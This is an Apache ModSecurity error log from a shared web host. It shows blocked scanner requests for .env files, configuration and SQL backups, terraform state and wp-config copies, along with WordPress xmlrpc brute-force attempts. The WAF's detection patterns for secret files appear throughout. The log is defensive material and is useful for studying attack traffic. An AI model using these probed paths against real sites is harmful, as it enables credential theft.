[Tue May 26 14:30:12.301672 2026] [security2:error] [pid 606909:tid 607110] [client 195.178.110.199:32880] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/stage/.env"] [unique_id "ahVhHF0yRtX9qA7aVUV1JwAAAMw"]
[Tue May 26 14:30:12.432466 2026] [security2:error] [pid 610693:tid 610890] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhGzvNO3hpmlY6M8RwIgAAAEM"]
[Tue May 26 14:30:12.542446 2026] [security2:error] [pid 610693:tid 610948] [client 195.178.110.199:48088] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/stripe/.env"] [unique_id "ahVhHDvNO3hpmlY6M8RwPwAAAH0"]
[Tue May 26 14:30:12.610700 2026] [security2:error] [pid 606909:tid 607152] [client 195.178.110.199:32936] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/terraform.tfstate.backup"] [unique_id "ahVhHF0yRtX9qA7aVUV1LwAAAPY"]
[Tue May 26 14:30:12.635771 2026] [cgid:error] [pid 610693:tid 610926] [client 195.178.110.199:32968] AH01264: stderr from /home2/azurm42s/gestionbar.azurmediatec.com/sysinfo.cgi: script not found or unable to stat
[Tue May 26 14:30:12.655830 2026] [security2:error] [pid 610693:tid 610868] [client 195.178.110.199:32988] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/test.php"] [unique_id "ahVhHDvNO3hpmlY6M8RwRAAAAC0"]
[Tue May 26 14:30:12.685657 2026] [security2:error] [pid 610693:tid 610851] [client 195.178.110.199:32966] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/test/.env"] [unique_id "ahVhHDvNO3hpmlY6M8RwSQAAABw"]
[Tue May 26 14:30:12.834753 2026] [security2:error] [pid 610693:tid 610936] [client 195.178.110.199:33000] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/v2/.env"] [unique_id "ahVhHDvNO3hpmlY6M8RwTwAAAHE"]
[Tue May 26 14:30:12.886198 2026] [security2:error] [pid 610693:tid 610924] [client 195.178.110.199:48088] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/user/.env"] [unique_id "ahVhHDvNO3hpmlY6M8RwUAAAAGU"]
[Tue May 26 14:30:12.955531 2026] [security2:error] [pid 610693:tid 610870] [client 195.178.110.199:48050] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/v1/.env"] [unique_id "ahVhHDvNO3hpmlY6M8RwUwAAAC8"]
[Tue May 26 14:30:12.968374 2026] [security2:error] [pid 610693:tid 610873] [client 195.178.110.199:32968] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/v3/.env"] [unique_id "ahVhHDvNO3hpmlY6M8RwVQAAADI"]
[Tue May 26 14:30:13.184039 2026] [security2:error] [pid 606909:tid 607088] [client 195.178.110.199:32880] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/var/www/html/.env"] [unique_id "ahVhHV0yRtX9qA7aVUV1PwAAALY"]
[Tue May 26 14:30:13.232633 2026] [security2:error] [pid 610693:tid 610860] [client 195.178.110.199:32952] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/web/.env"] [unique_id "ahVhHTvNO3hpmlY6M8RwZgAAACU"]
[Tue May 26 14:30:13.292326 2026] [security2:error] [pid 606909:tid 607087] [client 195.178.110.199:48006] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/var/www/.env"] [unique_id "ahVhHV0yRtX9qA7aVUV1QQAAALU"]
[Tue May 26 14:30:13.459458 2026] [security2:error] [pid 606909:tid 607057] [client 195.178.110.199:32936] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/wp-config.php"] [unique_id "ahVhHV0yRtX9qA7aVUV1RwAAAJc"]
[Tue May 26 14:30:13.481483 2026] [security2:error] [pid 610693:tid 610907] [client 195.178.110.199:32910] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/wp-config.php.bak"] [unique_id "ahVhHTvNO3hpmlY6M8RwdgAAAFQ"]
[Tue May 26 14:30:13.500378 2026] [security2:error] [pid 610693:tid 610838] [client 195.178.110.199:48108] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/website/.env"] [unique_id "ahVhHTvNO3hpmlY6M8RwdwAAAA8"]
[Tue May 26 14:30:13.512295 2026] [security2:error] [pid 610693:tid 610904] [client 195.178.110.199:33000] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/wp-config.php.old"] [unique_id "ahVhHTvNO3hpmlY6M8RwegAAAFE"]
[Tue May 26 14:30:13.628184 2026] [security2:error] [pid 606909:tid 607064] [client 195.178.110.199:48042] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/wp-config.php.new"] [unique_id "ahVhHV0yRtX9qA7aVUV1TAAAAJ4"]
[Tue May 26 14:30:13.670395 2026] [security2:error] [pid 610693:tid 610853] [client 195.178.110.199:32966] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/wp-content/mysql.sql"] [unique_id "ahVhHTvNO3hpmlY6M8RwfgAAAB4"]
[Tue May 26 14:30:14.249802 2026] [security2:error] [pid 606909:tid 607153] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhHV0yRtX9qA7aVUV1UAAAAPc"]
[Tue May 26 14:30:15.502206 2026] [security2:error] [pid 610693:tid 610940] [client 114.119.150.168:63029] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "glorodavionics.com"] [uri "/"] [unique_id "ahVhHzvNO3hpmlY6M8RwpAAAAHU"], referer: https://glorodavionics.com?route=information/information&information_id=5
[Tue May 26 14:30:15.992768 2026] [security2:error] [pid 606909:tid 607065] [client 167.71.198.58:50549] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "shardagalaxy.com"] [uri "/index.php"] [unique_id "ahVhH10yRtX9qA7aVUV1VwAAAJ8"], referer: https://shapeacademy.pl//blog//wp-login.php
[Tue May 26 14:30:16.192811 2026] [security2:error] [pid 610693:tid 610863] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhHzvNO3hpmlY6M8RwqAAAACg"]
[Tue May 26 14:30:16.615021 2026] [security2:error] [pid 606909:tid 607110] [client 167.71.198.58:50549] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.198.71.167.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shardagalaxy.com"] [uri "/blog//xmlrpc.php"] [unique_id "ahVhIF0yRtX9qA7aVUV1YQAAAMw"]
[Tue May 26 14:30:16.615176 2026] [security2:error] [pid 606909:tid 607110] [client 167.71.198.58:50549] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shardagalaxy.com"] [uri "/blog//xmlrpc.php"] [unique_id "ahVhIF0yRtX9qA7aVUV1YQAAAMw"]
[Tue May 26 14:30:18.208188 2026] [security2:error] [pid 610693:tid 610902] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhITvNO3hpmlY6M8RwuwAAAE8"]
[Tue May 26 14:30:18.912206 2026] [security2:error] [pid 606909:tid 607138] [client 167.71.198.58:53509] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.198.71.167.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shardagalaxy.com"] [uri "/blog//wp-login.php"] [unique_id "ahVhIl0yRtX9qA7aVUV1hwAAAOg"], referer: https://shardagalaxy.com//blog//wp-login.php
[Tue May 26 14:30:19.080774 2026] [security2:error] [pid 606909:tid 607155] [client 202.141.83.254:5791] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVhI10yRtX9qA7aVUV1igAAAPk"]
[Tue May 26 14:30:19.081423 2026] [security2:error] [pid 606909:tid 607155] [client 202.141.83.254:5791] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVhI10yRtX9qA7aVUV1igAAAPk"]
[Tue May 26 14:30:20.465252 2026] [security2:error] [pid 610693:tid 610949] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhJDvNO3hpmlY6M8Rw3AAAAH4"]
[Tue May 26 14:30:22.903344 2026] [security2:error] [pid 610693:tid 610732] [remote 45.148.10.5:54922] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "goadityaholidays.com.whitesun.in"] [uri "/.env"] [unique_id "ahVhJjvNO3hpmlY6M8Rw9QAADSY"]
[Tue May 26 14:30:22.942257 2026] [security2:error] [pid 610693:tid 610922] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhJjvNO3hpmlY6M8Rw7wAAAGM"]
[Tue May 26 14:30:23.919980 2026] [security2:error] [pid 610693:tid 610840] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhJzvNO3hpmlY6M8Rw-QAAABE"]
[Tue May 26 14:30:26.458268 2026] [security2:error] [pid 610693:tid 610824] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhKjvNO3hpmlY6M8RxIwAAAAE"]
[Tue May 26 14:30:26.978258 2026] [security2:error] [pid 610693:tid 610943] [client 113.164.94.151:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhKjvNO3hpmlY6M8RxLgAAAHg"]
[Tue May 26 14:30:27.988539 2026] [security2:error] [pid 610693:tid 610897] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhKzvNO3hpmlY6M8RxOgAAAEo"]
[Tue May 26 14:30:29.542988 2026] [security2:error] [pid 606909:tid 607082] [client 202.141.83.254:5836] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVhLV0yRtX9qA7aVUV2WgAAALA"]
[Tue May 26 14:30:29.543124 2026] [security2:error] [pid 606909:tid 607082] [client 202.141.83.254:5836] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVhLV0yRtX9qA7aVUV2WgAAALA"]
[Tue May 26 14:30:29.950455 2026] [security2:error] [pid 610693:tid 610755] [remote 45.148.10.5:54922] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "goadityaholidays.com.whitesun.in"] [uri "/.env.backup"] [unique_id "ahVhLTvNO3hpmlY6M8RxWwAAID0"]
[Tue May 26 14:30:30.296407 2026] [security2:error] [pid 610693:tid 610748] [remote 45.148.10.5:54922] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "goadityaholidays.com.whitesun.in"] [uri "/.env.old"] [unique_id "ahVhLjvNO3hpmlY6M8RxXAAAIzY"]
[Tue May 26 14:30:30.593540 2026] [security2:error] [pid 606909:tid 607154] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhLl0yRtX9qA7aVUV2dQAAAPg"]
[Tue May 26 14:30:30.961507 2026] [security2:error] [pid 610693:tid 610756] [remote 45.148.10.5:54922] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "goadityaholidays.com.whitesun.in"] [uri "/.env.bak"] [unique_id "ahVhLjvNO3hpmlY6M8RxXgAAKD4"]
[Tue May 26 14:30:31.271604 2026] [security2:error] [pid 610693:tid 610761] [remote 45.148.10.5:54922] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "goadityaholidays.com.whitesun.in"] [uri "/config/.env"] [unique_id "ahVhLzvNO3hpmlY6M8RxXwAAH0M"]
[Tue May 26 14:30:31.536646 2026] [security2:error] [pid 610693:tid 610754] [remote 45.148.10.5:54922] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "goadityaholidays.com.whitesun.in"] [uri "/app/.env"] [unique_id "ahVhLzvNO3hpmlY6M8RxZAAADzw"]
[Tue May 26 14:30:31.846184 2026] [security2:error] [pid 610693:tid 610759] [remote 45.148.10.5:54922] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "goadityaholidays.com.whitesun.in"] [uri "/src/.env"] [unique_id "ahVhLzvNO3hpmlY6M8RxaAAAdkE"]
[Tue May 26 14:30:32.106126 2026] [security2:error] [pid 610693:tid 610753] [remote 45.148.10.5:54922] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "goadityaholidays.com.whitesun.in"] [uri "/backend/.env"] [unique_id "ahVhMDvNO3hpmlY6M8RxbAAAQjs"]
[Tue May 26 14:30:32.409906 2026] [security2:error] [pid 610693:tid 610760] [remote 45.148.10.5:54922] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "goadityaholidays.com.whitesun.in"] [uri "/api/.env"] [unique_id "ahVhMDvNO3hpmlY6M8RxcgAAT0I"]
[Tue May 26 14:30:32.838565 2026] [security2:error] [pid 610693:tid 610762] [remote 45.148.10.5:54922] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 5.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "goadityaholidays.com.whitesun.in"] [uri "/config.php"] [unique_id "ahVhMDvNO3hpmlY6M8RxdwAAUUQ"]
[Tue May 26 14:30:33.297298 2026] [security2:error] [pid 606909:tid 607147] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhMF0yRtX9qA7aVUV2oAAAAPE"]
[Tue May 26 14:30:33.451227 2026] [security2:error] [pid 610693:tid 610763] [remote 45.148.10.5:54922] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 5.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "goadityaholidays.com.whitesun.in"] [uri "/settings.php"] [unique_id "ahVhMTvNO3hpmlY6M8RxfgAACkU"]
